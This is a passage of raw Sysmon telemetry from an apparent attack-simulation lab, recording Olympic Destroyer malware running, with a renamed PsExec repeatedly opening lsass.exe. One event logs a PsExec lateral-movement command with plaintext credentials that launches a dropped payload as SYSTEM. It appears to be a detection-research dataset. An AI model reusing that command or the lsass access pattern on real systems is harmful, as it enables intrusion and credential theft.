10:57:25.407{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4106-000000003802}1244C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.407{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.407{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.407{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:25.391{C8EA50B7-1315-6216-4106-000000003802}1244C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.328{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1315-6216-4306-000000003802}6300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.328{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1315-6216-4306-000000003802}6300C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.307{C8EA50B7-1315-6216-4306-000000003802}63006504C:\Windows\system32\conhost.exe{C8EA50B7-1315-6216-4106-000000003802}1244C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.307{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4006-000000003802}6280C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.307{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4006-000000003802}6280C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:25.275{C8EA50B7-1315-6216-4006-000000003802}6280C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.275{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1315-6216-4306-000000003802}6300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.260{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1315-6216-4306-000000003802}6300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.227{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1315-6216-4206-000000003802}5628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.227{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1315-6216-4206-000000003802}5628C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.207{C8EA50B7-1315-6216-4206-000000003802}56286692C:\Windows\system32\conhost.exe{C8EA50B7-1315-6216-4006-000000003802}6280C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.160{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1315-6216-4206-000000003802}5628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.160{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1315-6216-4206-000000003802}5628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.128{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1315-6216-4106-000000003802}1244C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.127{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.127{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.127{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.126{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.124{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1315-6216-4106-000000003802}1244C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.124{C8EA50B7-1315-6216-4106-000000003802}1244C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.123{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1315-6216-4106-000000003802}1244C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.091{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A43DC0FB24F89226070EDBFF26BAE15E,SHA256=C46C4D4A0BA4AEE47DD8D29BBC2A889C928A329A2F4BA1DF4D9B0EED2E4CEF47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.060{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D15C3D420C6336CB6B9910533C86AFBF,SHA256=91970F87B991BB0CFC85FEC1FFE2295335A2CBBA1B37DF2F63F2EDC8F50057D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.029{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1315-6216-4006-000000003802}6280C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.029{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.029{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.029{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.029{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.025{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-1315-6216-4006-000000003802}6280C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Tem